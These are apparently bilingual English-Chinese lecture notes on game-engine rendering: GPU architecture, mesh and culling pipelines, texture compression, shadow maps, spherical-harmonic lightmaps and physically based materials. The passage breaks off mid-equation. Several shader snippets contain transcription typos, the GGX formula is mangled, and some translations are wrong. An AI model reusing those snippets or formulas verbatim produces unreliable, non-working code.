    ​运行 CUDA 内核的 GPU 的一部分

    Texture Units 纹理单位

    A texture processing unit, that can fetch and filter a texture

    ​纹理处理单元,可以获取和过滤纹理

    CUDA Core

    Parallel processor that allow data to be workedon simultaneously by different processors

    ​并行处理器允许不同处理器同时处理数据

    Warp

    A collection of threads

    ​线程的集合

    Data Flow from CPU to GPU

    webp

    • CPU and Main Memory

      CPU 和主内存

      • Data Load / Unload

        数据加载/卸载

      • Data Preparation

        数据准备

    • CPU to GPU

      • High Latency

        高延迟

      • Limited Bandwidth

        带宽有限

    • GPU and Video Memory

      GPU 和视频内存

      • High Performance Parallel Rendering

        高性能并行渲染

    Always minimize data transfer between CPU and GPU when possible

    ​尽可能减少 CPU 和 GPU 之间的数据传输

    Be Aware of Cache Efficiency

    webp

    ​Cache 比内存更快,尽量少做内存交换。

    webp

    • Take full advantage of hardware parallel computing

      充分利用硬件并行计算

    • Try to avoid the von Neumann bottleneck

      尽量避免冯诺依曼瓶颈

    GPU Bounds and Performance

    ​GPU 限制和性能

    Application performance is limited by:

    ​应用程序性能受到以下因素的限制:

    • Memory Bounds

      内存限制

    • ALU Bounds

      ALU 边界

    • TMU (Texture Mapping Unit) Bound

      TMU(纹理映射单元)绑定

    • BW (Bandwidth) Bound

      BW(带宽)限制

    Modern Hardware Pipeline

    webp

    • Direct3D 12graphics pipeline

      Direct3D 12 图形管道

    • Mesh and amplification shaders

      网格和放大着色器

    • Direct3D 12 compute pipeline

      Direct3D 12 计算管道

    Other State-of-Art Architectures

    ​其他最先进的架构

    webp

    GPU:

    1.825 GHZ, 52CUS, 12 TFLOPS FP32,332 8streaming processors

    DRAM:

    16 GB GDDR6, 10GB high memory interleave + 6GB low memory interleave

    20 channels of x16 GDDR6 @ 14 Gbps->560GB

    CPU:

    8x Zen2 CPU cores @ 3.8 GHz, 3.6 GHz W/SMT 32KB L1 I$,32KB L1 D$,512KB L2 per CPU core

    webp

    Renderable

    Mesh Render Component

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    Building Blocks of Renderable

    ​可渲染的构建块

    webp

    Mesh Primitive

    ​网格基元

    webp

    Vertex and Index Buffer

    ​顶点和索引缓冲区

    webp

    • Vertex Data

      顶点数据

      • Vertex declaration

        顶点声明

      • Vertex buffer

        顶点缓冲区

    • Index Data

      索引数据

      • Index declaration

        索引声明

      • Index buffer

        索引缓冲区

    Why We Need Per-Vertex Normal

    webp

    ​为什么我们需要顶点法线?如果根据面法线计算的话,对于转角处,顶点法线方向可能会有歧义。

    Materials

    webp

    Determine the appearance of objects, and how objects interact with light

    ​确定物体的外观以及物体如何与光相互作用

    Famous Material Models

    webp

    Phong Model

    PBR Model - Physically based rendering 基于物理的渲染

    Subsurface Material - Burley SubSurface Profile 渲染皮肤

    Various Texures in Materials

    webp

    Variety of Shaders

    webp

    Render Objects in Engine

    Coordinate System and Transformation

    ​坐标系和变换

    webp

    Model assets are made based on local coordinate systems, and eventually we need to render them into screen space

    ​模型资源是基于局部坐标系制作的,最终我们需要将它们渲染到屏幕空间中

    Object with Many Materials

    webp

    ​如果一个对象仅使用一个材质,渲染出的效果可能不够真实。

    How to Display Different Textures on a Single Model

    webp

    ​将 Object 模型分为多个 Submesh,每个 Submesh 使用不同的 Material。

    webp

    ​如果每个 Submesh 都占据显存的空间,会导致浪费。

    Resource Pool

    webp

    ​使用一个资源池,加强资源的复用。

    Instance: Use Handle to Reuse Resources

    ​实例:使用句柄重用资源

    webp

    Sort by Material

    webp

    GPU Batch Rendering

    webp

    ​GPU Batch Rendering 是一种图形渲染技术,它利用计算机的 GPU(Graphics Processing Unit)来加速图形渲染过程。在传统的图形渲染中,每个物体都需要单独渲染,这会导致大量的数据传输和渲染时的负载,降低了渲染效率。

    ​而 GPU Batch Rendering 则可以将多个物体合并成一个批次(Batch),同时进行渲染。这种方式可以减少数据传输,提高渲染效率,特别是在大规模场景和复杂模型的情况下,可以极大地提高渲染速度。

    Q: What if group rendering all instances with identical submeshes and materials together?

    ​问:如果将具有相同子网格和材质的所有实例分组渲染在一起会怎样?

    Visibility Culling

    ​可见性剔除

    Culling One Object

    webp

    View Frustum

    ​观察片元

    Solider Bounding Box

    ​士兵边界框

    Using the Simplest Bound to Create Culling

    ​使用最简单的绑定来创建剔除

    webp

    • Inexpensive intersection tests

      廉价的交叉测试

    • Tight fitting

      紧身

    • Inexpensive to compute

      计算成本低廉

    • Easy to rotate and transform

      易于旋转和变换

    • Use little memory

      使用很少的内存

    Hierarchical View Frustum Culling

    webp

    ​使用 Quad Tree Culling 和 BVH 等,排除不可见对象

    Construction and insertion of BVH in Game Engine

    ​游戏引擎中 BVH 的构建和插入

    webp

    PVS (Potential Visibility Set)

    ​PVS(潜在可见性集)

    webp

    ​PVS(Potentially Visible Set)是一种基于空间划分的可视性剔除算法,用于在三维场景中快速确定观察点能够看到哪些物体。

    ​PVS 算法的基本思想是将场景分割成多个相邻的小区域(如八叉树等),然后对每个小区域计算其与其他小区域的可见性关系,即确定一个小区域可以直接看到哪些相邻的小区域,这些可见的小区域组成了该小区域的 PVS 集合。

    ​当观察点移动时,只需要判断当前观察点所处的小区域的 PVS 集合中是否包含其他小区域,从而确定哪些物体需要被渲染。这种方法可以大大减少需要渲染的物体数量,提高渲染效率。

    ​PVS 算法还可以通过优化 PVS 集合的计算和存储方式,以及合并相邻小区域的 PVS 集合等手段进一步提高效率。但是,由于 PVS 算法依赖于场景的空间划分,因此对于具有复杂几何形状或存在大量遮挡物的场景,该算法可能会带来较大的计算负担。

    Portal and PVS Data

    webp

    Determine potentially visible leaf nodes immediately from portal

    ​立即从门户确定潜在可见的叶节点

    The ldea of Using PVS in Stand-alone Games

    ​单机游戏中 PVS 的使用思路

    webp

    Green box:

    The area to determine the potential visibility where you need

    ​确定您需要的潜在可见度的区域

    Blue cells:

    Auto generated smaller regions of each green box.

    ​自动生成每个绿色框的较小区域。

    **Pros **优点

    • Much faster than BSP/Octree

      比 BSP/八叉树快得多

    • More flexible and compatible

      更灵活、更兼容

    • Preload resources by PVS

      通过 PVS 预加载资源

    GPU Culling

    webp

    ​先不渲染材质,根据深度信息排除掉不可见部分后再渲染。

    Texture Compression

    ​纹理压缩

    A must-know for game engine

    ​游戏引擎必须了解的知识

    Texture Compression

    webp

    • Traditional image compression like JPG and PNG

      传统图像压缩,如 JPG 和 PNG

      • Good compression rates

        良好的压缩率

      • lmage quality

        图像质量

      • Designed to compress or decompress an entire image

        设计用于压缩或解压缩整个图像

    • In game texture compression

      游戏中的纹理压缩

      • Decoding speed

        解码速度

      • Random access

        随机访问(传统图像压缩无法做到随机访问,即快速获取某个坐标的颜色值)

      • Compression rate and visual quality

        压缩率和视觉质量

      • Encoding speed

        编码速度

    Block Compression

    webp

    Common block-based compression format

    ​常见的基于块的压缩格式

    • On PC, BC7 (modern) or DXTC (old) formats

      在 PC 上,BC7(现代)或 DXTC(旧)格式

    • On mobile, ASTC (modern) or ETC / PVRTC (old) formats

      在移动设备上,ASTC(现代)或 ETC / PVRTC(旧)格式

    Authoring Tools of Modeling

    ​建模创作工具

    Modeling - Polymodeling

    webp

    ​使用基于多边形建模的软件。

    Modeling - Sculpting

    webp

    ​ZBrush 提供了一种新的建模概念——雕刻。

    Modeling -Scanning

    webp

    ​使用扫描仪建模。

    Modeling - Procedural Modeling

    webp

    ​程序化建模:

    Comparison of Authoring Methods

    ​创作方法比较

    PolymodelingSculptingScanningProcedural modeling
    AdvantageFlexibleCreativeRealisticIntelligent
    DisadvantageHeavy workloadLarge volume of dataLarge volume of dataHard to achieve

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    Sculpting Tools Create Infinite Details

    webp

    ​雕刻工具创造无限细节

    • Artists create models with infinite details

      艺术家创造具有无限细节的模型

    • From linear fps to open world fps, complex scene submit 10more times triangles to GPU per-frame

      从线性 fps 到开放世界 fps,复杂场景每帧向 GPU 提交 10 倍以上的三角形

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    webp

    GPU-Driven Rendering Pipeline (2015) GPU 驱动的渲染管道 (2015)

    • Mesh Cluster Rendering

      网格簇渲染

      • Arbitrary number of meshes in single drawcal

        单次绘制中任意数量的网格

      • GPU-culled by cluster bounds

        按集群边界进行 GPU 剔除,一个对象中的不可见部分就不渲染了

      • Cluster depth sorting

        聚类深度排序

    Geometry Rendering Pipeline Architecture (2021) 几何渲染管线架构(2021)

    • Rendering primitives are divided as:

      渲染基元分为:

      • Batch: a single APl draw (drawlndirect /drawIndexIndirect), composed of many Surfs

        Batch:单个 APl 绘制(drawlndirect /drawIndexIndirect),由许多 Surf 组成

      • Surf: submeshes based on materials, composed of many Clusters

        Surf:基于材质的子网格,由许多簇组成

      • Cluster: 64 triangles strip

        簇:64 个三角形条

    Programmable Mesh Pipeline

    webp

    GPU Culling in Cluster-Based Mesh

    ​基于集群的网格中的 GPU 剔除

    webp

    ​背面的 cluster 就看不见了。

    Nanite

    • Hierarchical LOD clusters with seamless boundary

      具有无缝边界的分层 LOD 集群

    • Don’t need hardware support, but using a hierarchical cluster culling on the precomputed BVH tree by persistent threads (CS) on GPU instead of task shader

      不需要硬件支持,但通过 GPU 上的持久线程(CS)而不是任务着色器对预先计算的 BVH 树使用分层集群剔除

    Take Away

    1. The design of game engine is deeply related to the hardware architecture design

      游戏引擎的设计与硬件架构设计有很深的关系

    2. A submesh design is used to support a model with multiple materials

      采用子网格设计来支持多种材质的模型

    3. Use culling algorithms to draw as few objects as possible

      使用剔除算法绘制尽可能少的对象

    4. As GPU become more powerful, more and more work are moved into GPU, which called GPu Driven

      随着 GPU 越来越强大,越来越多的工作转移到 GPU 上,这就是 GPU 驱动

    第五节:渲染中光和材质的数学魔法

    Rendering on Game Engine

    Lighting, Materials and Shaders

    Participants of Rendering Computation

    ​渲染计算参与者

    • Lighting

      灯光

      • Photon emit, bounce, absorb and perception is the origin of everything in rendering

        光子的发射、反弹、吸收和感知是渲染中一切的起源

    • Material

      材料

      • How matter react to photon

        物质如何对光子做出反应

    • Shader

      着色器

      • How to train and organize those micro-slaves to finish such a vast and dirty computation job between photon and materials

        如何训练和组织这些微型奴隶来完成光子和材料之间如此庞大而肮脏的计算工作

    An interesting adventure story joined by smart graphics scientists and engineers based on evolution of hardware.

    ​智能图形科学家工程师基于硬件的演变而加入的有趣冒险故事。

    The Rendering Equation

    ​James Kajiya 在 1986 年的 SIGGRAPH 提出了渲染方程:

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    出射 outgoing = 自发光 emitted + 反射光 reflected

    ​Radiance(辐射度)指的是在给定方向上单位面积上的能量辐射量。它表示了光线从光源或物体表面出射的能量。Radiance 与发射光线的方向、面积以及能量有关,通常用符号 L 表示,单位为 $W/(sr*m^2)$(瓦特/球面弧度平方米)。

    ​Irradiance(入射照度)指的是单位面积上受到的来自各个方向的光能量的总和。它表示了光线对物体表面的照射强度。Irradiance 与入射光线的方向、面积以及能量有关,通常用符号 E 表示,单位为 $W/m^2$(瓦特/平方米)。

    webp

    ​虽然这个方程很早就被提出,但是想要正确又高效地计算这个方程太困难了。

    webp

    Complexity of Real Rendering

    webp

    ​现实生活中的光太复杂了。

    • Indirect light

      间接光

    • Indirect shadow

      间接阴影

    • Direct light

      直射光

    • Scattering

      散射

    • Caustics

      焦散

    • Glossy reflections

      光泽反射

    The 1st Challenge: 1a Visibility to Lights

    webp

    ​第一困难:计算光照是否可见

    The 1st Challenge: 1b Light Source Complexity

    webp

    ​第一困难:光照种类复杂

    The 2nd Challenge: How to do Integral Efficiently on Hardware

    ​第二个挑战:如何在硬件上高效地进行积分

    webp

    • Brute-force way sampling

      暴力方式采样

    • Smarter sampling, i.e., Monta Carlo

      更智能的采样,即蒙塔卡罗

    • Derive fast analytical solutions

      得出快速分析解决方案

      • Simplify the $f_r$ :

        简化 $f_r$:

        • Assumptions the optical properties of materials

          假设材料的光学特性

        • Mathematical representation of materials

          材料的数学表示

      • Simplify the $L_i$ :

        简化$L_i$:

        • Deal with directional light, point light and spot light only

          仅处理定向光、点光和聚光灯

        • A mathematical representation of incident light sampling on a hemisphere, for ex: lBL and SH

          半球上入射光采样的数学表示,例如:lBL 和 SH

    The 3rd Challenge: Any matter will be light source

    ​挑战之三:任何物质都可以成为光源(会反射光)

    webp

    Starting from Simple

    Forget some abstract concepts for a while, ie. radiosity, microfacet and BRDF etc

    ​暂时忘记一些抽象概念,即。光能传递、微面、BRDF 等

    Simple Light Solution

    webp

    glLightfv(GL_LIGHTO, GL_AMBIENT, light_ambient);
    glLightfv(GL_LIGHTO, GL_DIFFUSE, light_diffuse);
    glLightfv(GL_LIGHTO,GL_SPECULAR, light_specular);
    glLightfv(GL_LIGHTO, GL_POSITION, light_position);
    • Using simple light source as main light

      使用简单光源作为主光

      • Directional light in most cases

        大多数情况下是定向光

      • Point and spot light in special case

        特殊情况下的点光源和聚光灯

    • Using ambient light to hack others

      利用环境光攻击他人

      • A constant to represent mean of complex hemisphere irradiance

        表示复半球辐照度平均值的常数

    • Supported in graphics APl

      图形 API 支持

    Environment Map Reflection

    webp

    • Using environment map to enhance glossary surface reflection

      使用环境贴图增强词汇表(?)表面反射

    • Using environment mipmap to represent roughness of surface

      使用环境 mipmap 来表示表面的粗糙度

    void main()
    {
    vec3 N = normalize(normal);
    vec3 V = normalize(camera position - world position);
    vec3 R = reflect(v, N);
    FragColor = texture(cube texture, R);
    }

    Early stage exploration of image-based lighting

    ​基于图像的照明的早期探索

    Math Behind Light Combo

    ​光组合背后的数学

    webp

    • Main Light

      主光源

      • Dominant Light

        主光源

    • Ambient Light

      环境光

      • Low-frequency of irradiance sphere distribution

        低频辐照度球体分布

    • Environment Map

      环境贴图

      • High-frequency of irradiance sphere distribution

        高频辐照度球体分布

    Blinn-Phong Materials

    webp

    ​冯光照模型是个很经典的光照模型,虽然现在有点过时了。

    Problem of Blinn-Phong

    • Not energy conservative

      不符合能量守恒定律(可能越反射越亮)

      • Unstable in ray-tracing

        光线追踪不稳定

    webp

    Left non-energy conserving model lead a lot of noise compare Right energy conserving model

    ​左边的非节能模型与右边的节能模型相比会产生很多噪音

    • Hard to model complex realistic material

      难以模拟复杂材质(冯模型模拟出来都有一股塑料感)

    webp

    Shadow

    webp

    • Shadow is nothing but space when the light is blocked by an opaque object

      当光线被不透明物体阻挡时,阴影只不过是空间

    • Already obsolete method

      已经过时的方法

      • planar shadow

        平面阴影

      • shadow volume

        阴影体积

      • projective texture

        投影纹理

    Shadow Map

    ​Shadow Map 是计算机图形学中用于实现阴影的一种技术。它基于光线追踪的概念,将场景从光源的视角渲染到一个深度纹理贴图上,以便在后续的渲染中使用这个纹理来确定哪些表面处于阴影之中。

    ​计算出阴影贴图。用一张 texture 表示阴影。

    webp

    // project our 3D position to the shadow map
    vec4 proj_pos = shadow viewproj * pos;
    // from homogeneous space to clip space
    vec2shadow_uv = proj_pos.xy / proj_pos.w;
    // from clip space to uv space
    shadow_uv = shadow_uv * 0.5 + vec2(0.5)
    // get point depth (from -1 to 1)
    float real_depth = proj_pos.z / proj_pos.w;
    // normalize from [-1..+1] to [0..+1]
    real_depth = real_depth * 0.5 + 0.5;
    // read depth from depth buffer in [0..+1]
    float shadow_depth = texture(shadowmap, shadow_uv).x;
    // compute final shadow factor by comparing
    float shadow_factor = 1.0;
    if(shadow_depth < real_depth)
    shadow_factor =0.0;

    Problem of Shadow Map

    webp

    Resolution is limited on texture

    ​分辨率受纹理限制

    webp

    Depth precision is limited in texture

    ​深度精度受到纹理的限制

    Basic Shading Solution

    • Simple light + Ambient

      简单光 + 环境光

      • dominent light solves No. 1b

        主光解决了第 1b 项挑战

      • ambient and EnvMap solves No.3 challanges

        环境光和 EnvMap 解决了第 3 项挑战

    • Blinn-Phong material

      • solve No.2 challange

        解决第 2 项挑战

    • Shadow map

      阴影贴图

      • solve No.1a challange

        解决第 1a 项挑战

    Cheap, Robust and Easy Modification

    ​便宜、鲁棒且易于修改

    First Wave of AAA Quality

    ​3A 游戏的渲染技术不断发展。

    Pre-computed Global Illumination

    ​用一个环境光常量来模拟其他物体反射出的所有光,减少计算。

    Why Global llumination is lmportant

    webp

    ​如果不考虑光的反射,大片面积将会一坨黑。

    How to Represent indirect Light

    webp

    • Good compression rate

      良好的压缩率

      • We need to store millions of radiance probes in a level

        我们需要在一个水平仪中存储数百万个辐射探头

    • Easy to do integration with material function

      易于与材料功能集成

      • Use polynomial calculation to convolute withmaterial BRDF

        使用多项式计算与材质 BRDF 进行卷积

    ​计算光照用到了下面数学工具:

    Fourier Transform

    webp

    $$f(x)=\frac{A}{2}+\frac{2A\cos(t\omega)}{\pi}-\frac{2A\cos(3t\omega)}{3\pi}+\frac{2A\cos(5t\omega)}{5\pi}-\frac{2A\cos(7t\omega)}{7\pi}+\cdots $$

    ​傅里叶变换让函数在时域和空域之间转换。

    Convolution Theorem

    webp

    ​引入傅里叶变换,让卷积速度更快!

    Spherical Harmonics

    ​球谐函数

    ​Spherical Harmonics(球谐函数)是一组用于描述球面上函数的数学函数系列。在计算机图形学中,球谐函数被广泛应用于光照和环境光的表示与计算。

    webp

    webp

    Spherical Harmonics, a mathematical system analogous to the Fourier transform but defined across the surface of a sphere. The SH functions in general are defined on imaginary numbers

    ​球谐函数,一种类似于傅立叶变换的数学系统,但定义在球体表面。SH 函数一般是根据虚数定义的

    Spherical Harmonics Encoding

    webp

    Sampling lrradiance Probe Anywhere

    webp

    Compress lrradiance Probe to SH1

    ​Lrradiance Probe(辐照度探针)是计算机图形学中用于捕捉和近似表示环境光照信息的技术。它通过在场景中放置一系列探针来采样场景中的辐照度(irradiance),并将这些采样结果存储起来,以便在渲染过程中使用。

    webp

    • Source lrradiance Probe

      光源辐照度探头

    • Compressed lrradiance Probe By SH1

      SH1 的压缩辐照度探头

    • Reconstruct lrradiance In Shader

      在着色器中重建光照度

    Store and Shading with SH

    Just RGBA8 color

    • Use 4 RGB textures to store 12 SH coefficients

      使用 4 个 RGB 纹理来存储 12 个 SH 系数

      • $L0$ coefficients in HDR (BC6H texture)

        HDR 中的 $L0$ 系数(BC6H 纹理)

      • $L1$ coefficients in LDR (3x Bc7 or BC1 textures)

        LDR 中的 $L1$ 系数(3x Bc7 或 BC1 纹理)

    • Total footprint for RGB SH lightmaps:

      RGB SH 光照贴图的总占用空间:

      • 32 bits (4 bytes)/texel for Bc6+Bc7, high quality mode

        Bc6+Bc7 32 位(4 字节)/texel,高质量模式

      • 20 bits (2.5 bytes) texel for Bc6+Bc1, low quality mode

        Bc6+Bc1 的 20 位(2.5 字节)纹理元素,低质量模式

    Simple diffuse shading

    webp

    SH Lightmap: Precomputed GI

    ​SH 光照贴图:预计算 GI

    ​空间换时间。

    ​SH Lightmap 是一种基于球谐函数(Spherical Harmonics)的光照贴图技术,可以用于近似表示场景中的光照信息。它通过将场景的光照信息转换为球谐系数并存储到贴图上,以便在渲染时快速计算每个片元的光照贡献。

    webp

    • Parameterized all scene into huge 2D lightmap atlas

      将所有场景参数化为巨大的 2D 光照图集

    • Using offline lighting farm to calculate irradiance probes for all surface points

      使用离线照明场计算所有表面点的辐照度探头

    • Compress those irradiance probes into SH coefficients

      将这些辐照度探头压缩为 SH 系数

    • Store SH coefficients into 2D atlas lightmap textures

      将 SH 系数存储到 2D 图集光照贴图纹理中

    Lightmap: UV Atlas

    webp

    Lightmap density

    ​光照贴图密度

    • Low-poly proxy geometry

      低多边形代理几何体

    • Fewer UV charts/islands

      更少的紫外线图表/岛屿

    • Fewer lightmap texels are wasted

      浪费的光照贴图纹理像素更少

    Lightmap: Lighing

    webp

    Indirect lighting, finalgeometry

    ​间接照明,最终几何

    • Project lightmap from proxiesto all LODs

      将光照贴图从代理投影到所有 LOD

    • Apply mesh details

      应用网格细节

    • Add short-range, high-frequency lighting detail by HBAO

      通过 HBAO 添加短距离、高频照明细节

    Lightmap: Lighting + Direct Lighting

    webp

    ​光照贴图:光照+直接光照

    Direct + indirect lighting, final geometry

    ​直接+间接照明,最终几何形状

    • Compute direct lighting dynamically

      动态计算直接照明

    Final Shading with Materials

    webp

    Final frame

    ​最终帧

    • Combined with materials

      与材质结合

    Lightmap

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Bake a lot of fine details of Gl on environment

        在环境上烘焙了 GL 的很多细节

    • Cons

      缺点

      • Long and expensive precomputation (lightmap farm)

        漫长而昂贵的预计算(光照贴图农场)

      • Only can handle static scene and static light

        只能处理静态场景和静态灯光

      • Storage cost on package and GPU

        包和 GPU 的存储成本

    Light Probe: Probes in Game Space

    webp

    Light Probe Point Generation

    webp

    Reflection Probe

    webp

    Light Probes + Reflection Probes

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Can be applied to both static and dynamic objects

        可应用于静态和动态对象

      • Handle both diffuse and specular shading

        处理漫反射和镜面反射着色

    • Cons

      缺点

      • A bunch of SH light probes need some precomputation

        一堆 SH 光探头需要一些预计算

      • Can not handle fine detail of Gl. l.e, soft shadow on overlapped structures

        无法处理 GL 的精细细节。即,重叠结构上的软阴影。

    Physical-Based Material

    Microfacet Theory

    ​微平面理论。

    webp

    BRDF Model Based on Microfacet

    ​基于 Microfacet 的 BRDF 模型

    webp

    Normal Distribution Function

    webp

    $$f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}$$

    $$NDF_{GGX}(n,h,\alpha)=\frac{\alpha^{2}}{\pi\left((n\cdot h){2}(\alpha{2}-1)+1\right)^{2}}$$

    Geometric Attenuation Term (self-shadowing)

    ​在计算机图形学中,几何衰减项(self-shadowing)是指在渲染过程中考虑物体自身阴影对光照效果的影响。当光线射向一个物体表面时,如果该表面的某些部分被遮挡,这些被遮挡的部分就会处于阴影之中,从而无法直接受到光的照射,导致其表面变暗。

    ​几何衰减项通常用于模拟光线在渲染过程中如何与物体表面相互作用,从而影响最终的光照结果。这种效应特别明显的情况是当光源和观察者之间有障碍物时,如一个物体投射的阴影落在自身表面上。

    ​几何衰减项可以通过各种方式来实现,其中一种常见的方式是使用阴影映射(shadow mapping)技术。在阴影映射中,首先从光源的视角渲染场景,并将渲染结果保存在一个深度贴图(depth map)中。然后,对于每个像素,通过比较深度贴图中的深度值来确定该像素是否在阴影之中。如果某个像素被深度贴图中的深度值所遮挡,那么该像素就被认为处于阴影之中,从而进行相应的颜色调整,实现几何衰减效果。

    webp

    $$\begin{gathered}
    f_{CookTorrance}=\frac{DFG}{4(\omega_o\cdot n)(\omega_i\cdot n)} \
    G_{Smith}(l,\nu)=G_{GGX}(l)\cdot G_{GGX}(\nu) \
    G_{GGX}(\nu)=\frac{n\cdot\nu}{(n\cdot\nu)(1-k)+k}\quad k=\frac{(\alpha+1)^{2}}{8}
    \end{gathered}$$

    // Geometry Term: Geometry masking/shadowing due to microfacets
    float GGr(float Ndotv, float k) {
    return Ndotv / (Ndotv * (1.0 - k) + k);
    }
    float G_Smith(float Ndotv, float NdotL, float roughness) {
    float k = pow(roughness + 1.0, 2.0) / 8.0;
    return GGX(NdotL, k) * GGr(Ndotv, k);
    }

    Fresnel Equation

    ​当视角接近反射平面时,反射率会急剧上升。

    webp

    $$\begin{aligned}&f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}\&F_{Schlick}(h,\nu,F_{0})=F_{0}+(1-F_{0})\left(1-(\nu\cdot h)\right)^{5}\end{aligned}$$

    ​这个 5 次方是数学家推导出来的。

    // Fresnel term with scalar optimization
    float F Schlick(float VoH, float f0) {
    float f = pow(1.0 - VoH, 5.0);
    return f0 + (1.0 - f0) * f;
    }

    Physical Measured Material

    webp

    MERL BRDF Database of measured materials

    ​这个数据集测量了各种材质的数据。

    Disney Principled BRDF

    Principles to follow when implementing model:

    ​实施模型时应遵循的原则:

    • Intuitive rather than physical parameters should be used

      应使用直观参数而不是物理参数

    • There should be as few parameters as possible

      参数应该尽可能少

    • Parameters should be zero to one over their plausible range

      参数在其合理范围内应为 0 到 1

    • Parameters should be allowed to be pushed beyond their plausible range where it makes sense

      应允许参数超出其合理范围

    • All combinations of parameters should be as robust and plausible as possible

      所有参数组合应尽可能稳健且合理

    Disney Principle Material Parameters

    ​Disney Principled BRDF 是迪士尼(Disney)开发的一种基于物理的渲染表面模型,用于在计算机图形学中模拟材质的外观。BRDF 是 Bidirectional Reflectance Distribution Function 的缩写,用于描述光线从表面反射的方式。Disney Principled BRDF 将多个常见的渲染表面模型(如 Lambert、Blinn-Phong、Cook-Torrance 等)融合成一个单一的、参数化的模型,使得艺术家和技术人员可以更简单地控制材质的外观,并且更好地满足物理真实性的要求。

    ​Disney Principled BRDF 的主要特点和参数包括:

    1. 基础颜色(Base Color): 表示表面的颜色,即在没有其他光照影响的情况下表面的颜色。

    2. 金属度(Metallic): 表示表面是否具有金属质感。金属度为 0 表示非金属材质,金属度为 1 表示完全是金属材质。

    3. 粗糙度(Roughness): 表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。

    4. 法线(Normal): 表示表面的法线方向,用于模拟表面的微观凹凸结构。

    5. 环境遮挡(Ambient Occlusion): 用于模拟光线在表面附近的阴影效果,增强表面的立体感。

      Disney Principled BRDF 的优点在于它简化了材质创建的流程,减少了需要调整的参数数量,同时也更符合物理真实性。通过调整基础颜色、金属度和粗糙度等参数,可以实现多种不同类型材质的外观,包括金属材质、塑料、玻璃等。

      这种模型的广泛应用使得它成为了许多计算机图形学软件和引擎中的标准渲染模型之一,例如 Pixar 的 RenderMan、Blender 内置的 Cycles 渲染引擎等。

    webp

    PBR Specular Glossiness

    ​Specular Glossiness(高光光泽度)是一种用于描述材质表面反射特性的属性。它通常被用于渲染引擎和材质编辑器中,用于控制物体表面的光泽程度以及高光的大小和清晰度。

    webp

    webp

    PBR Metallic Roughness

    ​Metallic Roughness 是一种用于描述材质外观的参数化模型,通常用于计算机图形学中的渲染。它是 Disney Principled BRDF 中的两个主要参数之一,用于控制材质的金属度和粗糙度,从而影响表面的反射和散射行为。

    1. 金属度(Metallic): 这个参数表示表面材质的金属属性程度。金属度为 0 表示非金属材质,例如塑料、木材等,而金属度为 1 表示完全是金属材质,例如铁、铜等。金属材质具有较强的镜面反射特性,因此在光照下会产生清晰的高光反射,而非金属材质则通常具有更多的漫反射。
    2. 粗糙度(Roughness): 这个参数表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。具有较高粗糙度的表面会导致光线在各个方向上散射,产生柔和的光照效果,而较低粗糙度的表面则会产生更锐利的反射光线。

    webp

    Covert MR to SG

    webp

    PBR Pipeline MR vs SG

    webp

    MR

    • Pros

      • Can be easier to author and less prone to errors caused by supplying incorrect dielectric F0 data

        可以更轻松地编写,并且不易因提供不正确的介电 F0 数据而导致错误

      • Uses less texture memory, as metallic and roughness are both grayscale maps

        使用更少的纹理内存,因为金属和粗糙度都是灰度图

    • Cons

      • No control over F0 for dielectrics in map creation. However, most implementations have a specular control to override thebase 4% value

        在创建地图时无法控制电介质的 F0。然而,大多数实现都有镜面反射控制来覆盖 4% 的基本值

      • Edge artifacts are more noticeable, especially at lowerresolutions

        边缘伪影更加明显,尤其是在较低分辨率下

    SG

    • Pros

      • Edge artifacts are less apparent

        边缘伪影不太明显

      • Control over dielectric F0 in the specular map

        控制镜面反射图中的电介质 F0

    • Cons

      • Because the specular map provides control over dielectric F0, it is more susceptible to use of incorrect values. lt is possible to break the law of conservation if handled incorrectly in the shader

        由于镜面反射贴图提供对电介质 F0 的控制,因此更容易使用不正确的值。如果在着色器中处理不当,可能会违反守恒定律

      • Uses more texture memory with an additional RGB map

        使用更多纹理内存和额外的 RGB 贴图

    Image-Based Lighting (IBL)

    Basic Idea of IBL

    ​IBL(Image-Based Lighting)是一种计算机图形学中常用的光照技术,用于模拟真实世界中的光照效果。它基于图像的方式来描述光照信息,通过对环境中的光照进行捕捉和处理,来为场景中的物体赋予逼真的光照效果。

    ​IBL 的基本原理是利用环境贴图(Environment Map)来模拟环境中的光照。环境贴图通常是一个球形或立方体贴图,捕捉了环境中的光照信息,包括天空、周围物体的反射等。这些贴图可以是基于真实场景拍摄的全景图像,也可以是通过计算得到的环境光照信息。

    webp

    • An image representing distant lighting from alldirections.

      代表来自各个方向的远处照明的图像。

    • How to shade a point under the lighting?

      如何在灯光下对点进行着色?

      Solving the rendering equation:

      求解渲染方程:

      $L_{o}(x,\omega_{o})=\int_{H^{2}}f_{r}(x,\omega_{o},\omega_{i})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i}$

    • Using Monte Carlo integration

      使用蒙特卡罗积分

      Large amount of sampling-Slow!

      采样量大-慢!

    webp

    Recall BRDF Function

    $$L_{o}(\boldsymbol{x},\omega_{o})=\int_{H^{2}}f_{r}(\boldsymbol{x},\omega_{o},\omega_{i})L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}\f_{r}=k_{d}f_{Lambert}+f_{CookTorrance}$$

    • $f_{Lambert}$ diffuse
    • $f_{CookTorrance}$ specular

    $$\begin{aligned}
    L_{o}(x,\omega_{o})& =\int_{H^{2}}(k_{d}f_{Lambert}+f_{CookTorance})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i} \
